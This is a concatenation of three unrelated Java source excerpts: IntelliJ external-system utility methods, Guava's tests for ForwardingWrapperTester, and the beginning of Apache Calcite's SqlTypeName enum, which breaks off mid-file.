int order2 = getOrder(o2);
return order1 > order2 ? 1 : order1 < order2 ? -1 : 0;
}
private int getOrder(@NotNull Object o) {
Queue<Class<?>> toCheck = new ArrayDeque<Class<?>>();
toCheck.add(o.getClass());
while (!toCheck.isEmpty()) {
Class<?> clazz = toCheck.poll();
Order annotation = clazz.getAnnotation(Order.class);
if (annotation != null) {
return annotation.value();
}
toCheck.add(clazz.getSuperclass());
Class<?>[] interfaces = clazz.getInterfaces();
if (interfaces != null) {
Collections.addAll(toCheck, interfaces);
}
}
return ExternalSystemConstants.UNORDERED;
}
};
@NotNull private static final NullableFunction<DataNode<?>, Key<?>> GROUPER = new NullableFunction<DataNode<?>, Key<?>>() {
@Override
public Key<?> fun(DataNode<?> node) {
return node.getKey();
}
};
@NotNull private static final Comparator<Object> COMPARABLE_GLUE = new Comparator<Object>() {
@SuppressWarnings("unchecked")
@Override
public int compare(Object o1, Object o2) {
return ((Comparable)o1).compareTo(o2);
}
};
private ExternalSystemApiUtil() {
}
@NotNull
public static String extractNameFromPath(@NotNull String path) {
String strippedPath = stripPath(path);
final int i = strippedPath.lastIndexOf(PATH_SEPARATOR);
final String result;
if (i < 0 || i >= strippedPath.length() - 1) {
result = strippedPath;
}
else {
result = strippedPath.substring(i + 1);
}
return result;
}
@NotNull
private static String stripPath(@NotNull String path) {
String[] endingsToStrip = {"/", "!", ".jar"};
StringBuilder buffer = new StringBuilder(path);
for (String ending : endingsToStrip) {
if (buffer.lastIndexOf(ending) == buffer.length() - ending.length()) {
buffer.setLength(buffer.length() - ending.length());
}
}
return buffer.toString();
}
@NotNull
public static String getLibraryName(@NotNull Library library) {
final String result = library.getName();
if (result != null) {
return result;
}
for (OrderRootType type : OrderRootType.getAllTypes()) {
for (String url : library.getUrls(type)) {
String candidate = extractNameFromPath(url);
if (!StringUtil.isEmpty(candidate)) {
return candidate;
}
}
}
assert false;
return "unknown-lib";
}
@Nullable
public static ArtifactInfo parseArtifactInfo(@NotNull String fileName) {
Matcher matcher = ARTIFACT_PATTERN.matcher(fileName);
if (!matcher.matches()) {
return null;
}
return new ArtifactInfo(matcher.group(1), null, matcher.group(2));
}
public static void orderAwareSort(@NotNull List<?> data) {
Collections.sort(data, ORDER_AWARE_COMPARATOR);
}
/**
* @param path target path
* @return absolute path that points to the same location as the given one and that uses only slashes
*/
@NotNull
public static String toCanonicalPath(@NotNull String path) {
String p = normalizePath(new File(path).getAbsolutePath());
assert p != null;
return PathUtil.getCanonicalPath(p);
}
@NotNull
public static String getLocalFileSystemPath(@NotNull VirtualFile file) {
if (file.getFileType() == FileTypes.ARCHIVE) {
final VirtualFile jar = JarFileSystem.getInstance().getVirtualFileForJar(file);
if (jar != null) {
return jar.getPath();
}
}
return toCanonicalPath(file.getPath());
}
@Nullable
public static ExternalSystemManager<?, ?, ?, ?, ?> getManager(@NotNull ProjectSystemId externalSystemId) {
return MANAGERS.getValue().get(externalSystemId);
}
public static Collection<ExternalSystemManager<?, ?, ?, ?, ?>> getAllManagers() {
return MANAGERS.getValue().values();
}
@NotNull
public static Map<Key<?>, List<DataNode<?>>> group(@NotNull Collection<DataNode<?>> nodes) {
return groupBy(nodes, GROUPER);
}
@NotNull
public static <K, V> Map<DataNode<K>, List<DataNode<V>>> groupBy(@NotNull Collection<DataNode<V>> nodes, @NotNull final Key<K> key) {
return groupBy(nodes, new NullableFunction<DataNode<V>, DataNode<K>>() {
@Nullable
@Override
public DataNode<K> fun(DataNode<V> node) {
return node.getDataNode(key);
}
});
}
@NotNull
public static <K, V> Map<K, List<V>> groupBy(@NotNull Collection<V> nodes, @NotNull NullableFunction<V, K> grouper) {
Map<K, List<V>> result = ContainerUtilRt.newHashMap();
for (V data : nodes) {
K key = grouper.fun(data);
if (key == null) {
LOG.warn(String.format(
"Skipping entry '%s' during grouping. Reason: it's not possible to build a grouping key with grouping strategy '%s'. "
+ "Given entries: %s",
data,
grouper.getClass(),
nodes));
continue;
}
List<V> grouped = result.get(key);
if (grouped == null) {
result.put(key, grouped = ContainerUtilRt.newArrayList());
}
grouped.add(data);
}
if (!result.isEmpty() && result.keySet().iterator().next() instanceof Comparable) {
List<K> ordered = ContainerUtilRt.newArrayList(result.keySet());
Collections.sort(ordered, COMPARABLE_GLUE);
Map<K, List<V>> orderedResult = ContainerUtilRt.newLinkedHashMap();
for (K k : ordered) {
orderedResult.put(k, result.get(k));
}
return orderedResult;
}
return result;
}
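// Hedged usage sketch, not part of the original class: demonstrates groupBy() with a simple
// NullableFunction grouper. Entries whose key resolves to null are skipped with a warning,
// and Comparable keys come back in sorted order. The sample data is illustrative only.
@SuppressWarnings("unused")
private static Map<Integer, List<String>> groupByLengthExample() {
// expected result: {1=[a], 2=[bb, cc]}
return groupBy(Arrays.asList("a", "bb", "cc"), new NullableFunction<String, Integer>() {
@Override
public Integer fun(String s) {
return s.length();
}
});
}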
@SuppressWarnings("unchecked")
@NotNull
public static <T> Collection<DataNode<T>> getChildren(@NotNull DataNode<?> node, @NotNull Key<T> key) {
Collection<DataNode<T>> result = null;
for (DataNode<?> child : node.getChildren()) {
if (!key.equals(child.getKey())) {
continue;
}
if (result == null) {
result = ContainerUtilRt.newArrayList();
}
result.add((DataNode<T>)child);
}
return result == null ? Collections.<DataNode<T>>emptyList() : result;
}
@SuppressWarnings("unchecked")
@Nullable
public static <T> DataNode<T> find(@NotNull DataNode<?> node, @NotNull Key<T> key) {
for (DataNode<?> child : node.getChildren()) {
if (key.equals(child.getKey())) {
return (DataNode<T>)child;
}
}
return null;
}
@SuppressWarnings("unchecked")
@Nullable
public static <T> DataNode<T> find(@NotNull DataNode<?> node, @NotNull Key<T> key, BooleanFunction<DataNode<T>> predicate) {
for (DataNode<?> child : node.getChildren()) {
if (key.equals(child.getKey()) && predicate.fun((DataNode<T>)child)) {
return (DataNode<T>)child;
}
}
return null;
}
@SuppressWarnings("unchecked")
@NotNull
public static <T> Collection<DataNode<T>> findAll(@NotNull DataNode<?> parent, @NotNull Key<T> key) {
Collection<DataNode<T>> result = null;
for (DataNode<?> child : parent.getChildren()) {
if (!key.equals(child.getKey())) {
continue;
}
if (result == null) {
result = ContainerUtilRt.newArrayList();
}
result.add((DataNode<T>)child);
}
return result == null ? Collections.<DataNode<T>>emptyList() : result;
}
public static void executeProjectChangeAction(@NotNull final Runnable task) {
executeProjectChangeAction(false, task);
}
public static void executeProjectChangeAction(boolean synchronous, @NotNull final Runnable task) {
executeOnEdt(synchronous, new Runnable() {
public void run() {
ApplicationManager.getApplication().runWriteAction(new Runnable() {
@Override
public void run() {
task.run();
}
});
}
});
}
public static void executeOnEdt(boolean synchronous, @NotNull Runnable task) {
if (synchronous) {
if (ApplicationManager.getApplication().isDispatchThread()) {
task.run();
}
else {
UIUtil.invokeAndWaitIfNeeded(task);
}
}
else {
UIUtil.invokeLaterIfNeeded(task);
}
}
/**
* Configures given classpath to reference target i18n bundle file(s).
*
* @param classPath process classpath
* @param bundlePath path to the target bundle file
* @param contextClass class from the same content root as the target bundle file
*/
public static void addBundle(@NotNull PathsList classPath, @NotNull String bundlePath, @NotNull Class<?> contextClass) {
String pathToUse = bundlePath.replace('.', '/');
if (!pathToUse.endsWith(".properties")) {
pathToUse += ".properties";
}
if (!pathToUse.startsWith("/")) {
pathToUse = '/' + pathToUse;
}
String root = PathManager.getResourceRoot(contextClass, pathToUse);
if (root != null) {
classPath.add(root);
}
}
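  // Illustrative use of the method above (a hypothetical sketch; the bundle name and the PathsList source
  // are made up, not taken from the surrounding code):
  //
  //   PathsList classPath = javaParameters.getClassPath();
  //   addBundle(classPath, "messages.MyBundle", MyBundle.class);
  //
  // The dotted name becomes "/messages/MyBundle.properties", and the resource root that contains it
  // (resolved via PathManager.getResourceRoot()) is appended to the classpath.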
@SuppressWarnings("ConstantConditions")
@Nullable
public static String normalizePath(@Nullable String s) {
return StringUtil.isEmpty(s) ? null : s.replace('\\', ExternalSystemConstants.PATH_SEPARATOR);
}
/**
   * We can divide all 'import from external system' use-cases into at least the following:
* <pre>
* <ul>
* <li>this is a new project being created (import project from external model);</li>
* <li>a new module is being imported from an external project into an existing ide project;</li>
* </ul>
* </pre>
   * This method allows us to differentiate between the two (e.g. we don't want to change the language level when a new module is
   * imported into an existing project).
*
* @return <code>true</code> if new project is being imported; <code>false</code> if new module is being imported
*/
public static boolean isNewProjectConstruction() {
return ProjectManager.getInstance().getOpenProjects().length == 0;
}
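  // Illustrative branching on the flag above (a hypothetical sketch, not from the original code):
  //
  //   if (isNewProjectConstruction()) {
  //     // a whole project is being imported - project-wide settings (e.g. language level) may be configured
  //   }
  //   else {
  //     // a module is being added to an existing project - leave project-wide settings untouched
  //   }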
@NotNull
public static String getLastUsedExternalProjectPath(@NotNull ProjectSystemId externalSystemId) {
return PropertiesComponent.getInstance().getValue(LAST_USED_PROJECT_PATH_PREFIX + externalSystemId.getReadableName(), "");
}
public static void storeLastUsedExternalProjectPath(@Nullable String path, @NotNull ProjectSystemId externalSystemId) {
if (path != null) {
PropertiesComponent.getInstance().setValue(LAST_USED_PROJECT_PATH_PREFIX + externalSystemId.getReadableName(), path);
}
}
@NotNull
public static String getProjectRepresentationName(@NotNull String targetProjectPath, @Nullable String rootProjectPath) {
if (rootProjectPath == null) {
File rootProjectDir = new File(targetProjectPath);
if (rootProjectDir.isFile()) {
rootProjectDir = rootProjectDir.getParentFile();
}
return rootProjectDir.getName();
}
File rootProjectDir = new File(rootProjectPath);
if (rootProjectDir.isFile()) {
rootProjectDir = rootProjectDir.getParentFile();
}
File targetProjectDir = new File(targetProjectPath);
if (targetProjectDir.isFile()) {
targetProjectDir = targetProjectDir.getParentFile();
}
StringBuilder buffer = new StringBuilder();
for (File f = targetProjectDir; f != null && !FileUtil.filesEqual(f, rootProjectDir); f = f.getParentFile()) {
buffer.insert(0, f.getName()).insert(0, ":");
}
buffer.insert(0, rootProjectDir.getName());
return buffer.toString();
}
/**
   * There is a possible case that the external project linked to an IDE project is a multi-project, i.e. contains more than one
   * module.
   * <p/>
   * This method tries to find the root project's config path, assuming that the given path points to a sub-project's config path.
*
* @param externalProjectPath external sub-project's config path
* @param externalSystemId target external system
* @param project target ide project
* @return root external project's path if given path is considered to point to a known sub-project's config;
* <code>null</code> if it's not possible to find a root project's config path on the basis of the
* given path
*/
@Nullable
public static String getRootProjectPath(@NotNull String externalProjectPath,
@NotNull ProjectSystemId externalSystemId,
@NotNull Project project)
{
ExternalSystemManager<?, ?, ?, ?, ?> manager = getManager(externalSystemId);
if (manager == null) {
return null;
}
if (manager instanceof ExternalSystemAutoImportAware) {
return ((ExternalSystemAutoImportAware)manager).getAffectedExternalProjectPath(externalProjectPath, project);
}
return null;
}
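  // Illustrative call (a hypothetical sketch; the paths are made up). If the registered manager implements
  // ExternalSystemAutoImportAware and recognizes '/home/me/project/util' as a known sub-project config,
  // the call resolves to the root project's config path, e.g. '/home/me/project':
  //
  //   String rootPath = getRootProjectPath("/home/me/project/util", externalSystemId, ideProject);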
/**
   * {@link RemoteUtil#unwrap(Throwable) unwraps} the given exception if possible and builds an error message for it.
*
* @param e exception to process
* @return error message for the given exception
*/
@SuppressWarnings({"ThrowableResultOfMethodCallIgnored", "IOResourceOpenedButNotSafelyClosed"})
@NotNull
public static String buildErrorMessage(@NotNull Throwable e) {
Throwable unwrapped = RemoteUtil.unwrap(e);
String reason = unwrapped.getLocalizedMessage();
if (!StringUtil.isEmpty(reason)) {
return reason;
}
else if (unwrapped.getClass() == ExternalSystemException.class) {
return String.format("exception during working with external system: %s", ((ExternalSystemException)unwrapped).getOriginalReason());
}
else {
StringWriter writer = new StringWriter();
unwrapped.printStackTrace(new PrintWriter(writer));
return writer.toString();
}
}
}
|
|
/*
* Copyright (C) 2012 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.testing.anotherpackage;
import static com.google.common.truth.Truth.assertThat;
import com.google.common.base.Equivalence;
import com.google.common.base.Function;
import com.google.common.base.Functions;
import com.google.common.base.Joiner;
import com.google.common.base.Predicate;
import com.google.common.collect.Ordering;
import com.google.common.primitives.UnsignedInteger;
import com.google.common.primitives.UnsignedLong;
import com.google.common.testing.ForwardingWrapperTester;
import com.google.common.testing.NullPointerTester;
import java.io.InputStream;
import java.nio.charset.Charset;
import java.util.concurrent.TimeUnit;
import java.util.regex.Pattern;
import junit.framework.AssertionFailedError;
import junit.framework.TestCase;
/**
* Tests for {@link ForwardingWrapperTester}. Live in a different package to detect reflection
* access issues, if any.
*
* @author Ben Yu
*/
public class ForwardingWrapperTesterTest extends TestCase {
private final ForwardingWrapperTester tester = new ForwardingWrapperTester();
public void testGoodForwarder() {
tester.testForwarding(
Arithmetic.class,
new Function<Arithmetic, Arithmetic>() {
@Override
public Arithmetic apply(Arithmetic arithmetic) {
return new ForwardingArithmetic(arithmetic);
}
});
tester.testForwarding(
ParameterTypesDifferent.class,
new Function<ParameterTypesDifferent, ParameterTypesDifferent>() {
@Override
public ParameterTypesDifferent apply(ParameterTypesDifferent delegate) {
return new ParameterTypesDifferentForwarder(delegate);
}
});
}
public void testVoidMethodForwarding() {
tester.testForwarding(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable);
}
});
}
public void testToStringForwarding() {
tester.testForwarding(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public String toString() {
return runnable.toString();
}
};
}
});
}
public void testFailsToForwardToString() {
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public String toString() {
return "";
}
};
}
},
"toString()");
}
public void testFailsToForwardHashCode() {
tester.includingEquals();
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public boolean equals(Object o) {
if (o instanceof ForwardingRunnable) {
ForwardingRunnable that = (ForwardingRunnable) o;
return runnable.equals(that.runnable);
}
return false;
}
};
}
},
"Runnable");
}
public void testEqualsAndHashCodeForwarded() {
tester.includingEquals();
tester.testForwarding(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public boolean equals(Object o) {
if (o instanceof ForwardingRunnable) {
ForwardingRunnable that = (ForwardingRunnable) o;
return runnable.equals(that.runnable);
}
return false;
}
@Override
public int hashCode() {
return runnable.hashCode();
}
};
}
});
}
public void testFailsToForwardEquals() {
tester.includingEquals();
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public int hashCode() {
return runnable.hashCode();
}
};
}
},
"Runnable");
}
public void testFailsToForward() {
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(Runnable runnable) {
return new ForwardingRunnable(runnable) {
@Override
public void run() {}
};
}
},
"run()",
"Failed to forward");
}
public void testRedundantForwarding() {
assertFailure(
Runnable.class,
new Function<Runnable, Runnable>() {
@Override
public Runnable apply(final Runnable runnable) {
return new Runnable() {
@Override
public void run() {
runnable.run();
runnable.run();
}
};
}
},
"run()",
"invoked more than once");
}
public void testFailsToForwardParameters() {
assertFailure(
Adder.class,
new Function<Adder, Adder>() {
@Override
public Adder apply(Adder adder) {
return new FailsToForwardParameters(adder);
}
},
"add(",
"Parameter #0");
}
public void testForwardsToTheWrongMethod() {
assertFailure(
Arithmetic.class,
new Function<Arithmetic, Arithmetic>() {
@Override
public Arithmetic apply(Arithmetic adder) {
return new ForwardsToTheWrongMethod(adder);
}
},
"minus");
}
public void testFailsToForwardReturnValue() {
assertFailure(
Adder.class,
new Function<Adder, Adder>() {
@Override
public Adder apply(Adder adder) {
return new FailsToForwardReturnValue(adder);
}
},
"add(",
"Return value");
}
public void testFailsToPropagateException() {
assertFailure(
Adder.class,
new Function<Adder, Adder>() {
@Override
public Adder apply(Adder adder) {
return new FailsToPropagageException(adder);
}
},
"add(",
"exception");
}
public void testNotInterfaceType() {
try {
new ForwardingWrapperTester().testForwarding(String.class, Functions.<String>identity());
fail();
} catch (IllegalArgumentException expected) {
}
}
public void testNulls() {
new NullPointerTester()
.setDefault(Class.class, Runnable.class)
.testAllPublicInstanceMethods(new ForwardingWrapperTester());
}
private <T> void assertFailure(
Class<T> interfaceType,
Function<T, ? extends T> wrapperFunction,
String... expectedMessages) {
try {
tester.testForwarding(interfaceType, wrapperFunction);
} catch (AssertionFailedError expected) {
for (String message : expectedMessages) {
assertThat(expected.getMessage()).contains(message);
}
return;
}
fail("expected failure not reported");
}
private class ForwardingRunnable implements Runnable {
private final Runnable runnable;
ForwardingRunnable(Runnable runnable) {
this.runnable = runnable;
}
@Override
public void run() {
runnable.run();
}
@Override
public String toString() {
return runnable.toString();
}
}
private interface Adder {
int add(int a, int b);
}
private static class ForwardingArithmetic implements Arithmetic {
private final Arithmetic arithmetic;
public ForwardingArithmetic(Arithmetic arithmetic) {
this.arithmetic = arithmetic;
}
@Override
public int add(int a, int b) {
return arithmetic.add(a, b);
}
@Override
public int minus(int a, int b) {
return arithmetic.minus(a, b);
}
@Override
public String toString() {
return arithmetic.toString();
}
}
private static class FailsToForwardParameters implements Adder {
private final Adder adder;
FailsToForwardParameters(Adder adder) {
this.adder = adder;
}
@Override
public int add(int a, int b) {
return adder.add(b, a);
}
@Override
public String toString() {
return adder.toString();
}
}
private static class FailsToForwardReturnValue implements Adder {
private final Adder adder;
FailsToForwardReturnValue(Adder adder) {
this.adder = adder;
}
@Override
public int add(int a, int b) {
return adder.add(a, b) + 1;
}
@Override
public String toString() {
return adder.toString();
}
}
private static class FailsToPropagageException implements Adder {
private final Adder adder;
FailsToPropagageException(Adder adder) {
this.adder = adder;
}
@Override
public int add(int a, int b) {
try {
return adder.add(a, b);
} catch (Exception e) {
// swallow!
return 0;
}
}
@Override
public String toString() {
return adder.toString();
}
}
public interface Arithmetic extends Adder {
int minus(int a, int b);
}
private static class ForwardsToTheWrongMethod implements Arithmetic {
private final Arithmetic arithmetic;
ForwardsToTheWrongMethod(Arithmetic arithmetic) {
this.arithmetic = arithmetic;
}
@Override
public int minus(int a, int b) { // bad!
return arithmetic.add(a, b);
}
@Override
public int add(int a, int b) {
return arithmetic.add(a, b);
}
@Override
public String toString() {
return arithmetic.toString();
}
}
private interface ParameterTypesDifferent {
void foo(
String s,
Runnable r,
Number n,
Iterable<?> it,
boolean b,
Equivalence<String> eq,
Exception e,
InputStream in,
Comparable<?> c,
Ordering<Integer> ord,
Charset charset,
TimeUnit unit,
Class<?> cls,
Joiner joiner,
Pattern pattern,
UnsignedInteger ui,
UnsignedLong ul,
StringBuilder sb,
Predicate<?> pred,
Function<?, ?> func,
Object obj);
}
private static class ParameterTypesDifferentForwarder implements ParameterTypesDifferent {
private final ParameterTypesDifferent delegate;
public ParameterTypesDifferentForwarder(ParameterTypesDifferent delegate) {
this.delegate = delegate;
}
@Override
public void foo(
String s,
Runnable r,
Number n,
Iterable<?> it,
boolean b,
Equivalence<String> eq,
Exception e,
InputStream in,
Comparable<?> c,
Ordering<Integer> ord,
Charset charset,
TimeUnit unit,
Class<?> cls,
Joiner joiner,
Pattern pattern,
UnsignedInteger ui,
UnsignedLong ul,
StringBuilder sb,
Predicate<?> pred,
Function<?, ?> func,
Object obj) {
delegate.foo(
s, r, n, it, b, eq, e, in, c, ord, charset, unit, cls, joiner, pattern, ui, ul, sb, pred,
func, obj);
}
@Override
public String toString() {
return delegate.toString();
}
}
public void testCovariantReturn() {
new ForwardingWrapperTester()
.testForwarding(
Sub.class,
new Function<Sub, Sub>() {
@Override
public Sub apply(Sub sub) {
return new ForwardingSub(sub);
}
});
}
interface Base {
CharSequence getId();
}
interface Sub extends Base {
@Override
String getId();
}
private static class ForwardingSub implements Sub {
private final Sub delegate;
ForwardingSub(Sub delegate) {
this.delegate = delegate;
}
@Override
public String getId() {
return delegate.getId();
}
@Override
public String toString() {
return delegate.toString();
}
}
private interface Equals {
@Override
boolean equals(Object obj);
@Override
int hashCode();
@Override
String toString();
}
private static class NoDelegateToEquals implements Equals {
private static Function<Equals, Equals> WRAPPER =
new Function<Equals, Equals>() {
@Override
public NoDelegateToEquals apply(Equals delegate) {
return new NoDelegateToEquals(delegate);
}
};
private final Equals delegate;
NoDelegateToEquals(Equals delegate) {
this.delegate = delegate;
}
@Override
public String toString() {
return delegate.toString();
}
}
public void testExplicitEqualsAndHashCodeNotDelegatedByDefault() {
new ForwardingWrapperTester().testForwarding(Equals.class, NoDelegateToEquals.WRAPPER);
}
public void testExplicitEqualsAndHashCodeDelegatedWhenExplicitlyAsked() {
try {
new ForwardingWrapperTester()
.includingEquals()
.testForwarding(Equals.class, NoDelegateToEquals.WRAPPER);
} catch (AssertionFailedError expected) {
return;
}
fail("Should have failed");
}
/** An interface for the 2 ways that a chaining call might be defined. */
private interface ChainingCalls {
// A method that is defined to 'return this'
ChainingCalls chainingCall();
// A method that just happens to return a ChainingCalls object
ChainingCalls nonChainingCall();
}
private static class ForwardingChainingCalls implements ChainingCalls {
final ChainingCalls delegate;
ForwardingChainingCalls(ChainingCalls delegate) {
this.delegate = delegate;
}
@Override
public ForwardingChainingCalls chainingCall() {
delegate.chainingCall();
return this;
}
@Override
public ChainingCalls nonChainingCall() {
return delegate.nonChainingCall();
}
@Override
public String toString() {
return delegate.toString();
}
}
public void testChainingCalls() {
tester.testForwarding(
ChainingCalls.class,
new Function<ChainingCalls, ChainingCalls>() {
@Override
public ChainingCalls apply(ChainingCalls delegate) {
return new ForwardingChainingCalls(delegate);
}
});
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to you under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.calcite.sql.type;
import org.apache.calcite.avatica.util.TimeUnit;
import org.apache.calcite.sql.SqlLiteral;
import org.apache.calcite.sql.parser.SqlParserPos;
import org.apache.calcite.util.DateString;
import org.apache.calcite.util.TimeString;
import org.apache.calcite.util.TimestampString;
import org.apache.calcite.util.Util;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.Iterables;
import com.google.common.collect.Sets;
import java.math.BigDecimal;
import java.sql.Types;
import java.util.Arrays;
import java.util.Calendar;
import java.util.List;
import java.util.Map;
import java.util.Set;
/**
* Enumeration of the type names which can be used to construct a SQL type.
* Rationale for this class's existence (instead of just using the standard
 * java.sql.Types ordinals):
*
* <ul>
* <li>{@link java.sql.Types} does not include all SQL2003 data-types;
* <li>SqlTypeName provides a type-safe enumeration;
* <li>SqlTypeName provides a place to hang extra information such as whether
* the type carries precision and scale.
* </ul>
*/
public enum SqlTypeName {
BOOLEAN(PrecScale.NO_NO, false, Types.BOOLEAN, SqlTypeFamily.BOOLEAN),
TINYINT(PrecScale.NO_NO, false, Types.TINYINT, SqlTypeFamily.NUMERIC),
SMALLINT(PrecScale.NO_NO, false, Types.SMALLINT, SqlTypeFamily.NUMERIC),
INTEGER(PrecScale.NO_NO, false, Types.INTEGER, SqlTypeFamily.NUMERIC),
BIGINT(PrecScale.NO_NO, false, Types.BIGINT, SqlTypeFamily.NUMERIC),
DECIMAL(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES, false,
Types.DECIMAL, SqlTypeFamily.NUMERIC),
FLOAT(PrecScale.NO_NO, false, Types.FLOAT, SqlTypeFamily.NUMERIC),
REAL(PrecScale.NO_NO, false, Types.REAL, SqlTypeFamily.NUMERIC),
DOUBLE(PrecScale.NO_NO, false, Types.DOUBLE, SqlTypeFamily.NUMERIC),
DATE(PrecScale.NO_NO, false, Types.DATE, SqlTypeFamily.DATE),
TIME(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.TIME,
SqlTypeFamily.TIME),
TIME_WITH_LOCAL_TIME_ZONE(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.OTHER,
SqlTypeFamily.TIME),
TIMESTAMP(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.TIMESTAMP,
SqlTypeFamily.TIMESTAMP),
TIMESTAMP_WITH_LOCAL_TIME_ZONE(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.OTHER,
SqlTypeFamily.TIMESTAMP),
INTERVAL_YEAR(PrecScale.NO_NO, false, Types.OTHER,
SqlTypeFamily.INTERVAL_YEAR_MONTH),
INTERVAL_YEAR_MONTH(PrecScale.NO_NO, false, Types.OTHER,
SqlTypeFamily.INTERVAL_YEAR_MONTH),
INTERVAL_MONTH(PrecScale.NO_NO, false, Types.OTHER,
SqlTypeFamily.INTERVAL_YEAR_MONTH),
INTERVAL_DAY(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_DAY_HOUR(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_DAY_MINUTE(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_DAY_SECOND(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_HOUR(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_HOUR_MINUTE(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_HOUR_SECOND(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_MINUTE(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_MINUTE_SECOND(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
INTERVAL_SECOND(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
false, Types.OTHER, SqlTypeFamily.INTERVAL_DAY_TIME),
CHAR(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.CHAR,
SqlTypeFamily.CHARACTER),
VARCHAR(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.VARCHAR,
SqlTypeFamily.CHARACTER),
BINARY(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.BINARY,
SqlTypeFamily.BINARY),
VARBINARY(PrecScale.NO_NO | PrecScale.YES_NO, false, Types.VARBINARY,
SqlTypeFamily.BINARY),
NULL(PrecScale.NO_NO, true, Types.NULL, SqlTypeFamily.NULL),
ANY(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES, true,
Types.JAVA_OBJECT, SqlTypeFamily.ANY),
SYMBOL(PrecScale.NO_NO, true, Types.OTHER, null),
MULTISET(PrecScale.NO_NO, false, Types.ARRAY, SqlTypeFamily.MULTISET),
ARRAY(PrecScale.NO_NO, false, Types.ARRAY, SqlTypeFamily.ARRAY),
MAP(PrecScale.NO_NO, false, Types.OTHER, SqlTypeFamily.MAP),
DISTINCT(PrecScale.NO_NO, false, Types.DISTINCT, null),
STRUCTURED(PrecScale.NO_NO, false, Types.STRUCT, null),
ROW(PrecScale.NO_NO, false, Types.STRUCT, null),
OTHER(PrecScale.NO_NO, false, Types.OTHER, null),
CURSOR(PrecScale.NO_NO, false, ExtraSqlTypes.REF_CURSOR,
SqlTypeFamily.CURSOR),
COLUMN_LIST(PrecScale.NO_NO, false, Types.OTHER + 2,
SqlTypeFamily.COLUMN_LIST),
DYNAMIC_STAR(PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES, true,
Types.JAVA_OBJECT, SqlTypeFamily.ANY),
GEOMETRY(PrecScale.NO_NO, true, ExtraSqlTypes.GEOMETRY, SqlTypeFamily.GEO);
public static final int MAX_DATETIME_PRECISION = 3;
// Minimum and default interval precisions are defined by SQL2003
// Maximum interval precisions are implementation dependent,
// but must be at least the default value
public static final int DEFAULT_INTERVAL_START_PRECISION = 2;
public static final int DEFAULT_INTERVAL_FRACTIONAL_SECOND_PRECISION = 6;
public static final int MIN_INTERVAL_START_PRECISION = 1;
public static final int MIN_INTERVAL_FRACTIONAL_SECOND_PRECISION = 1;
public static final int MAX_INTERVAL_START_PRECISION = 10;
public static final int MAX_INTERVAL_FRACTIONAL_SECOND_PRECISION = 9;
// Cached map of enum values
private static final Map<String, SqlTypeName> VALUES_MAP =
Util.enumConstants(SqlTypeName.class);
// categorizations used by SqlTypeFamily definitions
